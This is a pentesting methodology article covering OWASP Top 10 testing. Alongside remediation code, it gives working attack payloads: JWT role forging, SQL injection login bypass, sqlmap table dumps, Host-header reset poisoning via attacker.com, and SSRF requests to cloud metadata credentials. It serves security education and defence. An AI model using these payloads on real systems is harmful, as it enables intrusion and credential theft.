// Web App Pentesting

Web Application Penetration Testing Methodology: OWASP Top 10 in Practice

Introduction

Web application penetration testing is the systematic process of probing a web application for security vulnerabilities using the same techniques adversaries use, but in an authorized, controlled manner. A professional pentest delivers more than a Nessus scan — it demonstrates exploitability, assesses real-world business impact, and provides actionable remediation guidance.

This article documents the methodology used across web application security assessments on internal and customer-facing applications, following OWASP Testing Guide v4 and PTES (Penetration Testing Execution Standard) frameworks.

Assessment Methodology

Phase 1: Reconnaissance
  - Passive recon (OSINT, DNS, certificate transparency)
  - Active recon (directory fuzzing, tech fingerprinting)
  - Mapping attack surface

Phase 2: Vulnerability Discovery
  - Automated scanning (Burp Scanner, Nuclei)
  - Manual testing per OWASP Testing Guide
  - Business logic testing (manual only)

Phase 3: Exploitation
  - Confirm exploitability of each finding
  - Chain vulnerabilities for impact demonstration
  - Document proof of concept

Phase 4: Reporting
  - Risk rating per CVSS 3.1
  - Executive summary + technical details
  - Remediation guidance per vulnerability

OWASP Top 10 Testing Techniques

A01 - Broken Access Control

# Test 1: IDOR
GET /api/orders/10001  (your order)
GET /api/orders/10002  (try neighboring order)
GET /api/orders/1      (try admin/first order)

# Test 2: Forced browsing
# Use Burp Intruder or ffuf to enumerate admin paths
ffuf -u https://target.com/admin/FUZZ -w /usr/share/wordlists/dirb/big.txt -mc 200,301,302

# Test 3: JWT manipulation
# Decode JWT, change user role to admin, re-encode (requires PyJWT: pip install pyjwt)
# `token` is the JWT captured from your own authenticated session
import jwt
payload = jwt.decode(token, options={"verify_signature": False})  # read the claims without checking the signature
payload['role'] = 'admin'
new_token = jwt.encode(payload, key='', algorithm='HS256')
# Replay the request with new_token; if it is accepted, the server is not verifying signatures (or accepts an empty key)
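The server-side counterpart to Tests 1 and 3, as an added example that is not code from the original article: a standard-library HS256 verifier that rejects the empty-key re-encode and `alg: none` tokens, followed by an object-level ownership check for `/api/orders/<id>` so that a valid token alone does not open neighbouring orders. The secret, the order table and the claim names (`sub`, `role`, `exp`) are constructed for the example.

```python
import base64
import hashlib
import hmac
import json
import time

SECRET = b"constructed-server-secret-keep-out-of-the-repo"  # constructed value
ALLOWED_ALGS = {"HS256"}   # server-side allowlist; the header's 'alg' never widens it


def _b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign(payload: dict, key: bytes, alg: str = "HS256") -> str:
    """Mint a token. 'none' is supported here only so the example can show it being rejected."""
    header = {"alg": alg, "typ": "JWT"}
    parts = [_b64url_encode(json.dumps(header, separators=(",", ":")).encode()),
             _b64url_encode(json.dumps(payload, separators=(",", ":")).encode())]
    signing_input = ".".join(parts)
    if alg == "none":
        return signing_input + "."
    mac = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + _b64url_encode(mac)


def issue_token(sub: str, role: str, key: bytes = SECRET, ttl: int = 3600) -> str:
    return sign({"sub": sub, "role": role, "exp": int(time.time()) + ttl}, key)


def verify(token: str, key: bytes = SECRET):
    """Return the claims, or None. Rejects alg=none, wrong or empty keys, tampered payloads and expired tokens."""
    try:
        h64, p64, s64 = token.split(".")
        header = json.loads(_b64url_decode(h64))
        signature = _b64url_decode(s64)
    except ValueError:          # covers bad base64, bad JSON and a wrong number of segments
        return None
    if not isinstance(header, dict) or header.get("alg") not in ALLOWED_ALGS:
        return None
    expected = hmac.new(key, f"{h64}.{p64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, signature):   # constant-time; an empty signature also fails
        return None
    try:
        claims = json.loads(_b64url_decode(p64))
    except ValueError:
        return None
    exp = claims.get("exp") if isinstance(claims, dict) else None
    if not isinstance(exp, (int, float)) or exp <= time.time():
        return None
    return claims


# Constructed order store: owner is the subject that may read the order
ORDERS = {
    1: {"owner": "admin", "total": 0},
    10001: {"owner": "alice", "total": 42},
    10002: {"owner": "bob", "total": 7},
}


def get_order(token: str, order_id: int, key: bytes = SECRET):
    """Handler for GET /api/orders/<id>: authenticate, then authorize against the object itself."""
    claims = verify(token, key)
    if claims is None:
        return 401, None
    order = ORDERS.get(order_id)
    if order is None:
        return 404, None
    # Object-level check: the order's owner is compared to the caller, not just the role claim
    if order["owner"] != claims.get("sub") and claims.get("role") != "admin":
        return 403, None
    return 200, order
```

With this in place the article's three IDOR requests return 200, 403 and 403 for a normal user, the empty-key token and the unsigned token both fail closed with 401, and the role claim only matters after the signature has been checked.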

A03 - SQL Injection

# Manual testing - basic SQLi
# Test each input for SQLi using single quote
POST /login
username=admin'-- -&password=anything

# Time-based blind SQLi
username=admin' AND SLEEP(5)-- -

# Automated with SQLMap
sqlmap -u "https://target.com/profile?id=1" \
  --cookie="session=abc123" \
  --level=3 --risk=2 \
  --dbs                          # Enumerate databases
# Then dump the users table from a database found in the previous run
sqlmap -u "https://target.com/profile?id=1" --cookie="session=abc123" \
  --dump -D targetdb -T users    # Dump users table
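To show why the login payload above works and what the remediation in the report template changes, here is an added example (not code from the original article) with the vulnerable string-concatenated login beside the parameterized one, run against a constructed in-memory SQLite table. The table, salt and passwords are constructed; the hash is a stand-in, since the subject is the SQL handling, not password storage.

```python
import hashlib
import sqlite3


def _demo_hash(password: str) -> str:
    # Stand-in for a real password hash; the SQL handling is the subject here.
    return hashlib.sha256(b"constructed-salt" + password.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    """Constructed in-memory users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, password_hash TEXT)")
    conn.executemany(
        "INSERT INTO users (username, password_hash) VALUES (?, ?)",
        [("admin", _demo_hash("correct-horse")), ("alice", _demo_hash("battery-staple"))],
    )
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """The 'before': user input concatenated into the statement. With the article's
    payload admin'-- - the rest of the WHERE clause becomes a comment, so the
    password check never runs and the admin row comes back."""
    query = ("SELECT username FROM users WHERE username = '" + username +
             "' AND password_hash = '" + _demo_hash(password) + "'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_parameterized(conn: sqlite3.Connection, username: str, password: str):
    """The remediation: a prepared statement with bound parameters. The quote and
    the comment sequence are just characters inside a value; the driver never
    lets them reach the SQL parser as syntax."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password_hash = ?",
        (username, _demo_hash(password)),
    ).fetchone()
    return row[0] if row else None
```

The same `?` binding defeats the time-based payload as well: `admin' AND SLEEP(5)-- -` is looked up as a literal username and no function call is ever parsed.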

A07 - Identification and Authentication Failures

# Test 1: Account enumeration
curl -s -o /dev/null -w "%{http_code}" https://target.com/login -d "user=admin&pass=wrong"
curl -s -o /dev/null -w "%{http_code}" https://target.com/login -d "user=notexist&pass=wrong"
# A different status code, body, or response time between the two requests = user enumeration

# Test 2: Password reset poisoning
POST /reset-password
Host: attacker.com  # Host header injection
email=victim@company.com
# If reset link uses Host header, attacker receives reset link

# Test 3: Session token analysis (Burp Sequencer)
# Check entropy of session tokens
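The fixes a report would recommend for the three tests above, as an added example rather than code from the original article: a login that returns the same status, body and amount of hashing work whether or not the account exists, a reset link built from server configuration instead of the Host header, a Host allowlist, and a reset token drawn from the OS CSPRNG. The users, salt and base URL are constructed.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlencode

SALT = b"constructed-salt"


def _hash(password: str) -> str:
    # Demo hash only; what matters here is that both code paths do the same work.
    return hashlib.sha256(SALT + password.encode()).hexdigest()


USERS = {"admin": _hash("correct-horse-battery")}      # constructed user store
DUMMY_HASH = _hash("dummy-never-matches")               # hashed against when the user is unknown
GENERIC_FAILURE = (401, "Invalid username or password")


def login(username: str, password: str):
    """Test 1 mitigation: an unknown user and a wrong password produce the same
    status code, the same body and the same hash computation, so neither the
    response code nor the response time tells the two apart."""
    stored = USERS.get(username, DUMMY_HASH)
    match = hmac.compare_digest(stored, _hash(password))
    if match and username in USERS:
        return (200, "ok")
    return GENERIC_FAILURE


BASE_URL = "https://app.example.com"   # from server configuration, never from the request
ALLOWED_HOSTS = {"app.example.com"}    # names this deployment actually serves


def host_allowed(host_header: str) -> bool:
    """Reject requests whose Host header is not one of ours (hostname part only; port dropped)."""
    return host_header.lower().split(":", 1)[0] in ALLOWED_HOSTS


def build_reset_link(host_header: str) -> str:
    """Test 2 mitigation: the link is assembled from BASE_URL. The Host header is
    accepted as an argument only to show that it plays no part in the result."""
    token = secrets.token_urlsafe(32)   # Test 3: 256 bits from the OS CSPRNG, not a counter or timestamp
    return f"{BASE_URL}/reset-password?{urlencode({'token': token})}"
```

The request the article shows (`Host: attacker.com`) therefore fails `host_allowed` at the edge, and even if it reached the handler the e-mailed link would still point at `app.example.com`.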

A10 - Server-Side Request Forgery (SSRF)

# SSRF via URL parameter
POST /api/webhook
{"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"}
# AWS metadata service - can expose IAM credentials

# SSRF bypass techniques:
# - Use 127.0.0.1 instead of localhost
# - Use 0.0.0.0, ::1
# - URL encoding: http://%31%32%37%2E%30%2E%30%2E%31/
# - DNS rebinding for bypassing IP blacklists
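An outbound-URL validator that closes each of the bypasses listed above, as an added example that is not code from the original article: it allowlists the scheme, percent-decodes the host before classifying it, treats `0.0.0.0`, `::1`, loopback, link-local (including 169.254.169.254) and RFC 1918 addresses as non-routable, rejects a name if any of its resolved addresses is internal, and returns the vetted address so the caller can pin the connection to it instead of resolving a second time (the DNS-rebinding window). The DNS table is constructed so the example runs offline; `system_resolve` is the drop-in for deployment.

```python
import ipaddress
import socket
from urllib.parse import urlsplit, unquote

ALLOWED_SCHEMES = {"http", "https"}

# Constructed DNS answers; rebind.example.org models a host that answers with a
# public address first and a loopback address on a later lookup. 93.184.216.34 is
# used here only as a placeholder for a publicly routable address.
CONSTRUCTED_DNS = {
    "hooks.example.org": ["93.184.216.34"],
    "localhost": ["127.0.0.1", "::1"],
    "rebind.example.org": ["93.184.216.34", "127.0.0.1"],
}


def fake_resolve(host: str):
    try:
        return CONSTRUCTED_DNS[host]
    except KeyError:
        raise OSError(f"constructed resolver: unknown host {host}")


def system_resolve(host: str):
    """Real resolver for deployment: every A/AAAA answer, not just the first one."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def is_public(ip) -> bool:
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped   # ::ffff:127.0.0.1 is loopback in disguise
    # False for loopback, link-local (169.254/16), RFC 1918, 0.0.0.0, ::1, multicast, reserved
    return ip.is_global


def validate_outbound_url(url: str, resolve=fake_resolve):
    """Return (True, pinned_ip) when the URL may be fetched, else (False, reason)."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    host = unquote(host)   # %31%32%37%2E%30%2E%30%2E%31 -> 127.0.0.1 before classification
    try:
        addresses = [ipaddress.ip_address(host)]          # literal IPv4 or IPv6 host
    except ValueError:
        try:
            addresses = [ipaddress.ip_address(a) for a in resolve(host)]
        except (OSError, ValueError):
            return False, "resolution failed"
        if not addresses:
            return False, "no addresses"
    for ip in addresses:
        if not is_public(ip):
            return False, f"{ip} is not publicly routable"
    # Pinning: the HTTP client must connect to this address (sending Host: <host>)
    # rather than resolving again, otherwise a second DNS answer can rebind to an internal IP.
    return True, str(addresses[0])
```

A webhook handler would call `validate_outbound_url` on the submitted `url`, open the socket to the returned address, and still apply a short timeout and a no-redirect policy, since a 302 from a public host to an internal address is the same problem one hop later.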

Burp Suite Professional Workflow

Burp Suite Pro is the industry standard for web application testing. Our standard engagement workflow:

  1. Passive Crawl - Browse application through Burp Proxy to populate sitemap
  2. Active Scan - Run Burp Scanner on all in-scope targets
  3. Manual Testing - Focus on authentication, authorization, business logic
  4. Intruder - Brute force, fuzzing, IDOR enumeration
  5. Repeater - Manual exploitation and PoC development
  6. Extensions - AuthMatrix (IDOR/access control), Param Miner (hidden params), GAP (JS endpoint extraction)

Professional Report Template

VULNERABILITY: SQL Injection in Login Form
CVSS 3.1 Score: 9.8 (Critical)
CWE: CWE-89

Description:
The application login form is vulnerable to SQL injection via the
'username' parameter. An attacker can bypass authentication entirely
and access any account including administrative accounts.

Proof of Concept:
POST /login HTTP/1.1
Content-Type: application/x-www-form-urlencoded

username=admin'-- -&password=anything

Response: HTTP/1.1 302 Found (redirect to /dashboard as admin)

Impact:
Complete authentication bypass. Attacker can access any account,
exfiltrate customer data (GDPR breach), and potentially execute
OS commands via xp_cmdshell on MSSQL databases.

Remediation:
Use parameterized queries / prepared statements. Never concatenate
user input into SQL queries. Implement WAF as defense-in-depth.